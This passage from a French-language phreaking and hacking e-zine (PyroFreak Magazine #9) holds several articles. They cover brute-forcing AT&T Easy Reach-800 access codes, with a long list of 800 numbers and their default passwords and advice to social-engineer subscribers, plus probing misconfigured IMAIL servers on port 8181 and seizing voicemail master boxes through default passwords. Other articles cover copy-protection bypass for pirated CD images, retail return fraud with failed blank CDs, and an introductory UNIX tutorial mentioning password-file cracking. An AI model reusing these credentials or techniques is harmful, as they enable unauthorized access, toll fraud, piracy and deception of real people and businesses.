pas le bon password: "Your response is not the access code for this 800 number. Please enter the access code now." Mais, si ta trois essais infructueuses de suite, le service te déconnecte du 1-800 en te disant ceci: "You have not provided the access code for this 800 number. You call could not be completed. Please check the 800 number and dial again." Donc, ta juste a rappeler au meme numéro pour continuer ton crackage de password. ***A quoi sert ce service?*** D'après ce que j'ai pu comprendre, après avoir entrer un password valide, le service te transfert à un numéro. C'est comme un service, fais pour pas que le monde soit déranger par n'importe qui. Les usagers de ce type de systeme, donne juste leur numéro 1-800 et leur password aux personnes qui désirent. J'ai aussi remarqué, que chaque numéro "AT&T Easy Reach-800" pouvaient contenir plusieurs accounts. Donc, si ya 3-4 accounts sur le meme numéro (Donc c'est aussi un moyen pour at&t de se faire plus de cash avec un même numéro), ca devient très facile de trouver le password. C'est à cela que je veux en venir. ***Trouver le password*** J'ai remarquer que beaucoup de systemes, avaient les passwords suivants: 00 01 02 03 Ya des systemes avec 3 chiffres comme password, par défaut: (Plutot rare) 000 001 002 010 011 012 Chaque password valide sur chaque numéro "AT&T Easy Reach-800" transfert vers un utilisateurs du systeme différent. Donc, vous avez comme une chance sur 10 en moyenne de trouver un password valide, donc c'est pas ca qui est le plus compliqué. Surtout que beaucoup de system on un password par défaut. ***Quel but peut t'on avoir avec ce systeme, nous les phreakers???*** Pour le moment, je n'ai pas trouver beaucoup de buts, peut-être juste un, celui de trouver un usager du systeme idiot, et faire du Social Engenering avec celui-ci, parce que, ce n'est pas n'importe qui qui peut se payer un access sur ce type de systeme, donc ya surement de belles affaires intéressantes à nous dire. Si vous trouvez quelque chose d'autre d'intéres- sant avec ce type de système, veuiller me le faire savoir par e-mail à: neuro@pyrofreak.org . De toute dernière minute, je viens de trouver le numéro pour s'abonner à ce service: 1-800-850-TIES (8437). Donc, je crois que c'est un exellent moyen de faire du SE. (Une bonne maîtrise de la langue anglais est nécessaire, vu que le service est juste en anglais.) Pour conclure, j'ai décidé de vous donnez une liste de numéro "AT&T Easy Reach-800": Les chiffres a coter, sont quelques password de chaque systeme. (Crédit The Clone pour cette liste) 1-800-909-0799 (01) 1-800-909-0836 (02) 1-800-909-0951 (01) 1-800-909-0981 (000) to (019) 1-800-909-1408 (01), (02) 1-800-909-1521 (01), (02) 1-800-909-1597 (01),(02) 1-800-909-1615 (01) 1-800-909-1660 (01), (02) 1-800-909-1666 (66) 1-800-909-1886 (01), (02) 1-800-909-1939 (02) 1-800-909-2937 (01), (011), (02) 1-800-909-2944 (01), (011), (02) 1-800-909-2968 (01), (011), (02) 1-800-909-3007 (012) 1-800-909-3036 (01), (02) 1-800-909-3104 (01) 1-800-909-3164 (01), (02) 1-800-909-3190 (02) 1-800-909-3192 (022) 1-800-909-3205 (01), (02) 1-800-909-3229 (01), (02) 1-800-909-3254 (01), (02) 1-800-909-3266 (01), (02) 1-800-909-3294 (012), (013) 1-800-909-3323 (02) 1-800-909-3349 (01), (02) 1-800-909-3350 (02) 1-800-909-3353 (02) 1-800-909-3356 (01), (02) 1-800-909-3736 (02) 1-800-909-3742 (01) 1-800-909-3757 (02) 1-800-909-3758 (01), (02) 1-800-909-3768 (01), (02) 1-800-909-3769 (01), (02) 1-800-909-3808 (01), (02) 1-800-909-3829 (01) 1-800-909-3832 (01), (02) 1-800-909-3840 (01), (02) 1-800-909-3875 (02) 1-800-909-3889 (01), (02) 1-800-909-3893 (02) 1-800-909-3902 (01), (02) 1-800-909-3906 (01), (02) 1-800-909-3915 (01) 1-800-909-3954 (02) 1-800-909-3968 (01) 1-800-909-4035 (01) 1-800-909-4045 (01), (02) 1-800-909-4056 (01), (02) 1-800-909-4058 (01), (02) 1-800-909-4079 (01), (02) 1-800-909-4101 (02) 1-800-909-4110 (01) 1-800-909-4116 (02) 1-800-909-4131 (01) 1-800-909-4138 (02) 1-800-909-4153 (01), (02) 1-800-909-4188 (02) 1-800-909-4191 (01), (02) 1-800-909-4265 (01), (02) 1-800-909-4298 (01) 1-800-909-4351 (01), (02) 1-800-909-4363 (01) 1-800-909-4384 (01) 1-800-909-4393 (02) 1-800-909-4397 (02) 1-800-909-4404 (01), (02) 1-800-909-4463 (01) 1-800-909-4472 (01), (02) 1-800-909-4502 (01) 1-800-909-4595 (01), (02) 1-800-909-4665 (01), (02) 1-800-909-4666 (01) 1-800-909-4685 (02) 1-800-909-4692 (01), (02) 1-800-909-4732 (01) 1-800-909-4734 (02) 1-800-909-4742 (01), (02) 1-800-909-4790 (01), (02) 1-800-909-4797 (01) 1-800-909-4812 (01), (02) 1-800-909-4879 (01), (02) 1-800-909-4974 (01), (02) 1-800-909-5136 (01), (02) 1-800-909-5138 (01), (02) 1-800-909-5146 (02) 1-800-909-5149 (01), (02) 1-800-909-5166 (01), (02) 1-800-909-5168 (01), (02) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |26-Windows NT IMAIL Vulnerabilité |( ) Phreak (X) Hack ( ) Autres '.__________Par endrix __________ ______ fbasoft@yahoo.com _ _____ Introduction :::::::::::: Ok, le imail est un serveur de email qui est beaucoup utilisé par Windows NT. Si vous voullez voir combien de personne offre ce service, allez dans n'im- porte quel search engine et faites une recherche sur "imail" et vous allez en voir beaucoup. Le problème n'est pas vraiment une mauvais programmation mais plutôt un problème de configuration. J'ai pu remarquer que beaucoup de technicien ont complètement oublier de bien configurer le serveur. Comment Exploité :::::::::::::::: Hey bien, le serveur imail a un outil de HTML qui écoute sur le port 8181. Donc c'est bien simple, il faut vous connectez sur le port 8181 avec votre Netscape ou Internet Explorer et si vous voyez un problème de configuration il sera possible de l'exploiter. Comme je dis, allez dans un search engine, tappez "imail" et chaque serveur NT que vous allez voir qui ont imail d'installer, entrez l'addresse HTTP dans votre netscape et vous allez être capable de voir s'il y a un problème de configuration ex: www.yahoo.com:8181 (pour allez sur le port 8181 du serveur) Conclusion :::::::::: bon c'Est tout pour cela... c'est bien facile mais il faut le savoir :) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |27-System administration (Vmb) |(X) Phreak ( ) Hack ( ) Autres '.__________Par Neuro ________ ______ neuro@pyrofreak.org __ ___ Resalut tous, pour cet article, j'ai décidé de vous parler de quelque chose de très intéressant, il s'agit des systemes d'administration des VMBs, je parle ici, de la master Box qu'il a sur plusieurs des systemes de Vmbs. Habituellment, celle-ci a comme box le 99 ou 999 ou 9999. Donc, à vous de vérifier ca sur votre systeme de vmb en question. Mais celle-ci peut être situé ailleur sur le system, mais l'extention fini quasi toujours par 99 (199, 399, 1099, etc..) ou, il peut ne pas y en avoir du tout, dépendant du systeme. Celle-ci a une caractéristique très importante, c'est d'a partir de cet box, qu'on controle toute la Vmb. Exemple, on peu additioner des Boxs, en effaçer, en barrer, en reseter. On peu aussi changer le greeting principal de la VMB, changer la musique quand c'est occupé, changer l'heure et la date du systeme, etc... Mais ya un petit problème, le password sur une master box est habituellement beaucoup plus complexe que celui d'une simple box normal, mais ca peut arriver d'en trouver une avec un password par défaut, a vous de les tester. (Se référer à l'article #18 sur les password par défaut) Voici le menu d'une master box typique: 1-To Play your message 1-ToPlay the next message *1-To RePLay the current message 2-To save the current message 3-To delete the current message 4-To play the previous message 5-To for ** of the current message (Destination) 6-To reply the current message 7-For specials fonctions 4-For message day and time 5-For futur delevery review 6-For continu this message delete #-To delete all messages *-To cancel 7-For new or save messages 8-For continu with play 9-To return to the previous menu *2-To play the previous message ##-To select ultimate speed 9-To Return to the previous menu 2-To Send a new message 3-To Manager Mail Box 1- To change your greeting 2- To change your user options 3- To change your security code 7- To change message notification *- To review your user options 9- To return to the previous menu 3- To manager list 9- To return to the previous menu 8-For System administration 1- To record the system annoucement 2- To delete the system annoucement 3- To record the busy hold music 4- To manage users (Enter the user ID) 1- To lock this user 2- To unlock this user 3- To reset this user 4- To detele this user 9- To cancel 5- To add a new user 6- To set the system time and date 1- To set the day 2- To set the time 9- To return to the previous menu *- To review the system status 9- To return to the previous menu 0-To exit the user mode #-To hang up En voici un autre, avec un peu moins d'options, mais toujours du meme type: 1- To play your messages 1- To play the next message 2- To replay the message 3- To delete the message 4- To play the previous message 5- To for ** of the message To select a destination 1- For a user 4- For a distribution list 9- To return to the previous menu 6- To reply this message 7- For specials functions 8- To transfert to the send of this message 9- To return to the previous menu 2- To send a new message To Select a distination 1- To a user 2- To record the message 1- To review 2- To rerecord 3- To append 4 To cancel 9- To save 3- To send message 5- To send with verification 6- To sent to the private message 9- To return to the previous menu 9- To return to the previous menu 4- For the distribution list 9- To return to the previous menu 3- To exit the Voice Mail System 4- To change your option 3- To change your password 5- To record your busy music *- To review your option setting 9- To return to the previous menu 5- To change your greeting 6- To manager list 1 to 7- To select your list 1- To review the current list 2- To add a user ID 3- To delete a user ID 4- To record a list comment 9- To return to the previous menu 9- To return to the previous menu 8- System Administration 1- To record the system annoucement 2- To delete the system annoucement 3- To record the busy hold music 5- To manage users (Enter the user ID#?) 1-To lock the user ID 2-To unlock the user ID 3-To reset the user ID 9-To cancel *- To review system status 9- To return to the previous menu #- To hang up Une master box est tout à fait comme une box normal, elle a seulement un option supplémentaire, System Administration, qui d'après moi fait tout son charme à ce type de box:)))). Comme vous le voyez dans ces 2 menus, vous pouvez manipuler le systeme de différentes façons selon le type de box. Ici on remarque qu'on a une grande marge de manoeuvre avec le premier menu, vu qu'on peu additioner et effacer des Box, ce qui n'est pas le cas dans le deuxième menu. Aussi dans le premier menu, on peu changer l'heure et la date du systeme, ou dans certain cas, ça pourrais être utile. Je voudrais préciser que ces menus on été produits par moi-même, avec une petite enregistreuse et tout le tralala. Je sais pas si vous avez remarquer l'option "*". Celle-ci est intéressante, mais on peu quasi pas jouer beaucoup avec ces informations. Voici les divers informations donnés avec cet option. Le pourcentage du disque dur utilisé. (Pour le monde qui savaient pas, les messages sont entreposer sur un HD en fichier audio.) L'Heure et la date du systeme Plusieurs autres informations du type on/off (Buzy old music, etc..) Pour conclure, les 2 menus que je viens de vous présenter sont plus ou moins intéressant. Ils en a de beaucoup mieux que cela, ou vous pouvez activé l'option outdial, rediriger des box vers des numéros externe, etc... A vous de trouver les meilleurs cibles possibles. Salut Neuro ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |28-ISO, \\aReZ & MP3 (Part 2) |( ) Phreak ( ) Hack (X) Autres '.__________Par Vip0|a________ ______ vipola@pyrofreak.org __ ___ ¸ ¸ ¸ ¸ ¸ /´´´´´´´´´´´´´´´´´´´´´í´Í´´í´´´´Í´´´´´´´´´´´´´´/~¬,¸ ´ / ¯¯¯_ ¯ ¯ ¯ ¯ ¯¯¯¯¯¯¯ / ¨ _-/ ¯ (o) ISO, \\aReZ & MP3 (Part 2) ¯¯¯ /¸ ¯-\ ¯ -> by Vip0|a \` ```ò``ò```ò````ò``````ò````````````````````````~¬,¸ ¨ Bon, la drnière fois, je vous avais parlé de quelques notions de base sur le sujet, voici maintenant des informations détaillés à propos du ISO, \\'arez et MP3. Modification d'un ISO ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Les ISO, ok, je vous avais dit qu'un iso était un fichier portant l'extension .bin et qui comptait tout les données du CD en question. Bien qu'un ISO soit un tout et ne soit pas fait pour être modifier, il nous est quand même possible d'y ajouté des modification si la nécessité s'impose. Pour ce faire, nous allons avoir recours à un petit programme qui porte le nom de WinImage. Le programme nous offre la possibilité d'ouvrir le fichier ISO tout comme on le ferais apret une archive ZIP, RAR, ARJ, ACE et compagnie. Ouain, C'est bin beau, mais à quoi ca sert tout ca ?!.. Utilité n°1: Le ISO est fait pour un CD de 80 min et vous ne disposez que de cds de 74 minutes. En générale, ce problème s'impose surtout pour les jeux, qui sont de plus en plus volumineux. Simplement enlever quelques fichier plus ou moin utile (Microsoft DirectX ou bien des Pub pour d'autre jeux) devrais reglé notre problème. Pour ce faire, vous n'aurez qu'a extraire le ISO dans un repertoire sur votre disque dure, effacer les fichiers indésirées, puis à gravé le reste à l'aide du logiciel 'Adaptec Eazy CD Creator'. Noubliez pas d'inscrire le bon nom de volume pour le CD. En théorie, si vous avez tout fait de façon approprié, tout devrais marché. Il est à noté que les majuscules et minuscules dans le nom des CDs ne sont pas important car sous windows, les majuscules ne sont pas considérés comme un caractère différent. ce qui n'est pas le cas sous linux par exemple. Utilité n°2: Remplacé un fichier défectueux. Servez-vous du même procédé qu'utilisé au numéro 1, mais au lieu de supprimé des fichiers, remplacés-les. Utilité n°3: Visualiser les fichiers pour en extraire des informations voulus, ou prendre un fichier sans être oubliger de le gravé sur le CDs pour accédé à son comptenu. Utilité n°4: Ajouter des fichiers, des patch, un générateur de Serial number, ou autres. Utilité n°5: Servez-vous de votre imagination, je suis sur que vous en trouverez une tonne d'autres. Protections ¯¯¯¯¯¯¯¯¯¯¯ Maintenant je vais vous parler des protections courante qui peuvent nous donné du file à retorde. Un procédé que l'on peut rencontré de temps en temps sur les CDs de jeux, est la présence de 4 fichiers de 650 mb sur le CD, se sont de faux fichiers qui font semblant d'occupé 3 gb sur le cd, lorsque vous les copiez sur votre HD, ils occupe vraiment 650 mb, les seuls CDs sur lesquelles j'ai retrouvé ce principe de sécurité est sur le CD#1 de Final Fantasy VII Français pour PC et sur le Jeu 'Commandos: Behind Ennemy Lines' version Française. Le principe de ces protections ont le procédé d'en plus de vérifier si le CD est dans le lecteur, s'assuré que ces fichiers sont présents sur celui-ci. Pour détourné ce système de sécurité, vous devez trouvé ou codé une patch qui modifiera le programme pour ne plus qu'il vérifie la présences de ces fichiers sur le CDs. Ensuite, gravez le CD sans tenir compte des quatres fichiers de 650mb. (Je vous suggère de mettre votre patch sur le CD, il vous sera plus aisé de la conservé et de la gardé à votre disposition, ca ne devrais pas dérangé le fonctionnement du Jeu.) La mode de nos jours consernant les CDs audio est de mettre un supplément lisible à l'aide de votre ordinateur, Or, ces données sont introduit à la suite des trames sonors. Ce qui nous cause un problème, car il est impossible à l'aide des logiciels de gravures courant (Adaptec Eazy CD Creator, CDr-Win, etc..) de gravé une 'Track' de donné à la suite d'une 'Track Audio'. (Ce phénomène se retrouve par exemple sur 'OffSpring - Americana' et le CD de sound tracks du film n°1 des POKéMON.) si vous tentez de créé un ISO à partir d'un Cd de ce genre à l'aide de 'CDr-Win', il vous donnera l'erreur suivante: _ (X) Error: Internal bugcheck detected ¯ Si vous ne désirez que les trames sonors, vous pouvez utiliser 'SpinDoctor' Inclus avec 'Adaptec Eazy CD Creator'. Créez des fichiers Wave sur votre disque dure. Puis gravez les avec CD creator en créant un CD audio. CD-rom, IDE vs SCSI ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ En rénéral, la différence entre SCSI et IDe est la rapidité de lecture et de transfert de données, mais si vous en connaissez un peut plus sur le sujet, vous savez que leur façon de lire est différente, cette différence, lors de l'utilisation normal du système, n'est généralement pas perçu par l'utilisateur. Parcontre, lors de la copie de certains CDs audio, ce petit détail peut devenir d'une importance Capitale. Certain CDs sont gravé de tels sorte que si vous tentez de les copier à l'aide d'un CD IDE, vous aurez le son mais il grichera ('Limp Bizkit - Significant Other' en est un exemple) Pour le copier, vous devrez le faire jouer avec votre CDplayer et l'enregistrer en Wav avec GoldWave. Si vous faites le tout de fasson approprié, vous obtiendrez une qualité excellente, même avec une carte de son 16 bits. Vérifier la qualité audio ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Avant de gravé des sons wave sur un CD audio, je vous suggère de les écoutés à l'aide de Winamp. Cela vous évitera de gravé des CDs qui griches. La technique d'échange de CD ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Ouain, j'ai souvant entendu parlé de cette technique, mais je voulais vous la confirmé, c'est celle de retournée les CDs vierge dont vous avez manquer la gravure. Remplissez des case de Maxell avec plein de CD manké Maxell, Mettez les Case Maxell dans des Boite Maxell, et allez les retourner avec la facture en disant qu'ils ont tous planté à la même place et que vous pensez que c'est un défaut de fabrication et que vous en voudriez d'autres en rempla- cement. IT WORKED 4 ME !!! - Vip0|a - ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |29-UNIX, hack et compagnie (1ère partie) |( ) Phreak (X) Hack ( ) Autres '.__________Par Tekrebel ________ ______ tekrebel@vl.videotron.ca ___ Préface Pratiquement toute l'information dans cet article a déjà été publiée à quelque part d'autre auparavant, soit dans un livre, dans un manuel, dans un autre e-zine (riiiiippp;), text file sur Internet, etc. Ceci dit, cet article ne vise pas à recracher toute cette masse d'information, mais plutôt d'en faire un résumé complet et pratique afin d'instruire les débutants et les moins débutants. Je vise dans cet article à en apprendre même à ceux qui savent comment fonctionne UNIX et qui ont Linux, Solaris ou FreeBSD à la maison depuis 3 ou 4 ans. La complexité des informations ira en grandissant afin de maintenir une cohérence dans l'article alors pour ceux qui connaisse déjà la base de UNIX, vous pouvez sauter quelques paragraphes en avant. Introduction UNIX est un système d'exploitation (OS) développé par AT&T Labs dans les années 60. Depuis, plusieurs compagnies ont développé leur propre variante de UNIX telles Solaris (Sun), AIX (IBM), IRIX (SGI), HP-UX (HP), Xenix (SCO), BSD (Berkley Software Design), FreeBSD, Linux et quelques autres moins connues. Dans le cas de FreeBSD et Linux, ce ne sont pas des compagnies qui assurent le développement mais une immense communauté de développeurs qui donnent de leur temps pour coder différentes parties du système d'exploitation (noyau). On parle ici de développement open-source, c'est-à-dire, que l'on peut se procurer le code source du système d'exploitation gratuitement et le modifier. Je ne vais pas m'étendre sur Linux et FreeBSD, vous pouvez aller chercher vous même de l'information sur ces deux excellents systèmes d'exploitation sur Internet (www.freebsd.org, www.linux.org/com). Pour en revenir à UNIX en général, il possède les caractéristiques suivantes: 1) Il est multi-tâche 2) Il est multi-usagers 3) Il est multi-platforme (n'importe quelle architecture possède son UNIX) 4) Il n'est pas limité à un système de fichier 5) Il a des capacités de réseau intégrés Au tout début, UNIX était conçu pour rouler sur des grosses machines très puissantes (et très chères) servant à effectuer une quantité énorme de tâches à la fois (traitement des impôts des contribuables, département de la défense, etc.) mais au cours de la dernière décennie, UNIX a été adapté pour les micro- ordinateurs (ce que vous avez à la maison). C'est pourquoi on retrouve des variantes telle Linux, FreeBSD et Solaris qui roule sur l'architecure x86 et même RISC de Macintosh. UNIX est aussi le principal système d'exploitation utilisé par les serveurs sur Internet (créé en 1969 par le Département de la Défense américaine et non par America Online il y a 5 - 6 ans). Bon, d'accord, NT est est montée mais UNIX est encore réputé comme plus stable et plus puissant dans le domaine. Kernel et shell C'est deux mots peuvent vous sembler nouveaux et propres à UNIX mais vous les utilisez dans Windows ou DOS à chaque jour. Commençons par le kernel. Le kernel est le noyau du système d'exploitation. C'est lui qui fait l'interface entre le processeur, la mémoire, les périphériques, les fonctions de réseaux de bas-niveau, etc. En gros, il s'occupe de pas mal tout ce qui est essentiel. Les utilisateurs de DOS et de Windows ignorent la plupart du temps l'existence du kernel, celui se nomme msdos.sys sous DOS et kernel32.dll dans Windows 9x. Évidemment, s'il fallait interragir directement avec le kernel à chaque fois qu'on voulait effectuer une opération, ça serait extrêmement compliqué. C'est pour cela qu'on utilise un shell, qui est l'interface entre l'utilisateur et le kernel. Bref, Le shell est un programme qui s'occupe de rendre la tâche plus facile à l'utilisateur. Aussi connu sous nom d'interpréteur de commandes, c'est le programme qui rend les commandes telle cd / possibles. La principale différence avec DOS et Windows est que dans UNIX on a le choix entre plusieurs shell, tous ayant des forces et faiblesses. Sous DOS, celui utilisé 99% du temps est COMMAND.COM (il existe d'autres shell pour DOS mais ils sont extrêmement rares). Dans l'environnement UNIX, les deux les plus connus sont sans doute sh et bash. Personnellement, j'utilise le bash shell, il est une version rehaussée de sh et contient des commandes très pratiques. C'est également un des shells les plus simple. Comme autres shells, on retrouve ksh, zsh, csh et une multitude d'autres. On peut simplifier le modèle kernel/shell de la façon suivante: Utilisateur /-------------\ | Shell | | /---------\ | | | | | | | KERNEL | | | | | | | \---------/ | \-------------/ On voit ainsi que le shell entoure le kernel et oblige l'utilisateur à passer par celui-ci pour effectuer des opérations. La méthore du kernel avec le noyau fait donc du sens quand on y pense. Petite parenthèse, quand on parle de Linux, on parle du noyau/kernel, tous les programmes eux font partie de ce qu'on appelle une distribution Linux. Linux est un kernel, non un gros package de programmes tel Redhad ou Debian. Principales commande de UNIX Comme dans le bon vieux DOS, les opérations s'effectuent à l'aide d'un interface "command line" ou "écran noir avec c:\" pour ceux qui savent pas c'est quoi. En passant, si vous avez jamais utilisé DOS, vous aller trouver la partie qui suit assez rushante. Bon, évidemment, les commandes sont pas les mêmes que dans DOS mais c'est assez semblable. Premièrement, il est TRÈS important de retenir que tout dans UNIX est "case sensitive", ce qui veut dire que le système d'exploitation fait la différence entre les lettres minuscules et majuscules dans les commandes. Alors cd =! CD =! cD =! Dc. La syntaxe des commandes est généralement la suivante: commande [paramètres]. Voici une liste des principales commandes avec leur équivalent en DOS: ls: Affiche le contenu d'un répertoire, même chose que dir en DOS rm: Efface un fichier ou un répertoire (avec l'option -r), équivalent à del mv: Déplace un répertoire ou un fichier, move dans DOS cp: Copie un répertoire ou un fichier, copy dans DOS cat: Affiche le contenu d'un fichier à l'écran, équivalent à type dans DOS * cat peut aussi servir à d'autre chose qu'afficher à l'écran un fichier Quelques exemples: Pour copier warez.xxx dans /home/tekrebel : cp warez.xxx /home/tekrebel cp WAREZ.XXX /home/tekrebel ne fonctionne pas! Case sensitive oubliez pas. Afficher le contenu du fichier codesecret : cat codesecret Ou encore, pour l'effacer : rm codesecret Et dépendemment du shell qu'on utilise, on peux utiliser certains opérateurs qui donnent droits à des fonctions supplémentaires. Je m'explique par un exemple, supposons que je veux exécuter un programme en arrière-plan (en background), je tape ma commande suivie de &. Ceci a pour effet d'exécuter ma commande en arrière-plan et de me fournir le PID (process ID, plus d'explications la dessus plus loin). À l'aide des commandes fg et bg, on peux amener en avant-plan ou en arrière plan un programme en spécifiant le PID. Voici une liste des principaus opérateurs et leurs utilité: commande & Fait rouler le programme en arrière-plan commande > fichier Enregistre la sortie du programme dans un fichier commande >> fichier Même chose sauf que le fichier n'est pas écrasé, le contenu est tout simplement rajouté à la fin (append) commande 1 | commande 2 La sortie de la commande 1 sert d'entrée à la commande 2 commande 1 | commande 2 Exécute une commande à la suite d'une autre L'utilité de ces commandes vous appraîtra plus évidente plus tard, pour l'instant contentez vous de savoir qu'elles existent. Quand vous voulez plus d'aide sur un programme ou une commande, essayez commande --help, ça fonctionne dans 90% des cas. Sinon, essaye -h ou -?. Pour de l'aide plus détaillée, faites man commande, cela vous apportera une aide quelque peu chargée d'information plus ou moins inutile mais c'est la manière d'avoir la description la plus complète de tous les paramètres d'une commande. Par exemple, man rm vous apportera la liste complète de tous les paramètres que l'on peut passer à la commande rm (remove file/directory). L'aide est parfois compliquée mais à la longue on s'habitue. L'organisation des fichiers dans UNIX peut en surprendre quelques-uns. En effet, il n'y aucun disque a:, d:, etc. Tout est transparent et unifié dans une seule arborescence. Quand on veut accéder à une disquette par exemple, on doit "mounter" (accrocher ou fixer en français?) la disquette. Ceci a pour effet d'intégrer l'arborescence du disque à la structure de disque principale. Comme une image (ASCII dans ce cas-ci) vaut mille-mot, voici un petit exemple: Structure principale: /---+ | +--/etc | +--/mnt---+ | | | +--/floppy | +--/bin | ... et plein d'autres Structure de la disquette /---+ | +--/porn | +--/warez | +--/3l33te On veut mounter la disquette sur la structure principale. Habituellement, les disques mountés sont mis dans le répertoire /mnt. On mount la disquette avec la commande suivante: mount -t ext2 /dev/fd0 /mnt/floppy. On a ensuite comme résultat ce qui suit: /---+ | +--/etc | +--/mnt---+ | | | +--/mnt/floppy---+ | | | +--/mnt/floppy/porn | | | +--/mnt/floppy/warez | | | +--/mnt/floppy/3l33te | +--/bin | ... et plein d'autres Vous voyez un peu comment ça fonctionne? Le /dev/fd0 comme argument avec la commande mount fait référence au fichier de périphérique (device file) qui point vers la lecteur de disquette. Dans le répertoire /dev, on retrouve des centaines de ces fichiers. J'expliquerai l'utilité de ces fichiers dans un prochain chapitre. PIDs et TTYs Voici quelques concepts importants à saisir en ce qui concerne l'environnement UNIX. Premièrement, il faut savoir que chaque programme qui roule sur le système d'exploitation se voit attribuer un PID, c'est-à-dire, un process ID (identificateur de processus). Ce PID sert principalement au kernel (noyau du système d'exploitation) mais on s'en sert parfois comme par exemple quand un programme gèle et qu'on veut l'éliminer. (kill -s 9 [#pid]) en UNIX. Pour les amateurs de Windows, ça ressemble étrangement à notre cher CTRL-ALT- DELETE. C'est pratiquement la même chose sauf que dans Windows, on ne voit pas les PIDs. Pour voir la liste des programmes sous notre contrôle et leurs PIDs, on utilise la commande ps. Elle nous retourne quelque chose semblable à ceci: PID TTY STAT TIME COMMAND 124 tty1 R 3:45 cc 5565 tty1 R 0:00 ps On peut voir qu'il y a deux programmes actifs, le premier (cc est le compilateur C) possède le PID 124, utilise le TTY 1, est en exécution (R pour running) et il s'exécute depuis 3 minutes 45 secondes. Même si la commande ps n'a été en exécution que quelques microsecondes, elle apparait quand même dans la liste puisque que ps donne les programmes qui s'exécutent au moment de son exécution. Autre concept important, celui des TTYs. TTY veut dire Teletype Writer et a été utilisé au début par Bell pour assister les personnes sourdes qui veulent communiquer. Mais qu'est-ce que les sourds ont comme rapport avec UNIX?! Tout simplement qu'un TTY dans UNIX est une sorte d'écran. Je dis "une sorte" parce qu'un TTY est en fait un fichier spécial dans le répertoire /dev qui pointe vers l'écran, un autre terminal ou un autre périphétique tel un clavier, souris, etc. On retrouve dans UNIX plusieurs de ces fichiers, /dev/tty1, /dev/tty2, etc. Tous pointe vers un terminal "virtuel" différent. On peut changer de terminal en appuyant habituellement sur ALT+F[Numéro terminal]. Si je peux comparer avec Windows, c'est comme avoir plusieurs fenêtres DOS ouvertes et changer entre celles-ci. Utilisateurs et sécurité Ah, ça commence à devenir un peu plus intéressant ici, on va parler de la sécurité sur UNIX. Évidemment, quand on parle de système multi-usagers, il faut mettre en place un système de sécurité puisque les systèmes où les usagers sont tous honnêtes et ne commettent pas d'erreur n'existent pas. Quand on pense sécurité, on pense d'abord aux hackers et aux personnes qui tentent d'avoir accès illégalement à vos fichiers et données. Mais la sécurité d'un système vise aussi à empêcher un utilisateur distrait d'effacer les fichiers importants sur le serveur. Imaginez, vous travaillez sur un gros projet important depuis 3 mois et quelqu'un supprime le mauvais répertoire (qui s'avère être le votre) sur le serveur. Bon, pas besoin de vous faire un dessin là-dessus je crois. La sécurité sur UNIX est basée principalement autour du fichier /etc/passwd. Celui contient le nom des usagers, leur identificateur (UID, user id), leur numéro de groupe (GID, group id) et quelques autres informations. Ah oui, j'oubliais, ce fichier contient quelque fois le mot de passe des usagers sont forme encryptée. Je vais éclaircir ce point tout de suite. Sur les vieux systèmes UNIX et encore aujourd'hui quelques fois, les mots de passe encryptées sont contenus dans /etc/passwd, qui en passant est accessible en lecture à tous les utilisateurs. De nos jours, la plus part du temps, le champ qui contient le mot de passe est remplaçé par un jeton (* normalement). Les mots de passe sont donc dans un autre fichier, d'habitude /etc/shadow, celui-ci ne pouvant être lu que par l'administrateur (root). Cette mesure met donc un frein ou bon vieux "grab the /etc/passwd and crack it". On appelle cette procédure le password shadowing. Voici à quoi ressemble un fichier /etc/passwd "non shadowé": root:sdfHgd68:0:0::/root:/bin/bash tekrebel:Hdf36557Gdg:100:100:Tekrebel:/home/tekrebel:/bin/bash tilamer::101:101:3l33t3:/home/lamer:/bin/bash Bon, qu'est-ce qu'on voit ici? Chaque ligne correspond à un usager. Chaque ligne est divisée en plusieurs champs divisés par des double-points ":". Le premier champ contient le nom d'usager, le deuxième le mot de passe encrypté ou bien * si le password shadowing est activé ou alors dans le cas de certains usagers spéciaux qui ne servent qu'au système d'exploitation. Le troisième et quatrième champ contiennent le UID et GID respectivement. Le cinquième champ sert à entrer des informations diverses comme le vrai nom de l'utilisateur ou bien son adresse, numéro de téléphone etc. Le 6e contient le répertoire personnel de l'usager et le dernier champ, son shell par défaut. Concernant le GID, UNIX utilisent des groupes d'usagers pour faciliter la restriction de l'accès aux fichiers. Ces groupes et leurs membres sont définis dans /etc/group. Pour ceux qui ont travaillé avec Novell Netware avant, ça doit vous donner une idée. Revenons à mon exemple, dans la première ligne on voit qu'il s'agit de l'utilisateur root (l'administrateur), que son mot de passe est encrypté, que son répertoire personnel est /root et que son shell est le bash. Devinez le reste. Maintenant qu'on connait la base du modèle de sécurité, je vais aborder le système de fichier et ses droits. Contrairement à Novell, il n'y a que trois attributs principaux sur les fichiers, écrire (W), lire(R) et exécuter(X). Les attributs sont affectés aux fichiers ainsi qu'aux répertoires. Comme un exemple vaut mille mots ou presque, voici le contenu d'un répertoire quelconque: tekrebel:/home/tekrebel# ls -l (ls -l donne la liste détaillée des fichiers) total 3 -rwxrwxrwx 1 tekrebel root 4096 Dec 22 12:18 quake -r--r----- 1 root root 1024 Dec 11 7:00 smurflist srwxrwxr-x 1 root root 10002521 Sep 22 17:05 sendmail drwx------ 1 tekrebel tekrebel 1024 Dec 22 12:25 hackutils/ tekrebel:/home/tekrebel# Ce contenu de répertoire est totalement fictif et ne sert qu'à des fins d'exemples. Tout d'abord, la première partie à gauche nous indique les droits sur le fichier ou répertoire. Cette partie est divisée en quatres sections distinctes. Le masque de droits est sous la forme suivante: x111222333. Le x est le "droit" spécial, il indique s'il s'agit d'un répertoire, d'un fichier spécial ou d'un programme SUID 0. Ce dernier terme (SUID 0) veut dire que le programme est exécuté en ayant les droits d'un autre utilisateur. Plusieurs programmes essentiels au fonctionnement de UNIX ont besoin d'être exécutés avec les privilèges de l'administrateur. Alors, en ayant ce droit, les programmes sont exécutés en tant que root. Attention, il faut s'assurer que ces programmes sont sécuritaires sinon il y a possibilité de faille de sécurité puisque n'importe quel usager exécute le programme en tant que root. Il faut donc limiter le plus possible le nombre de programmes qui 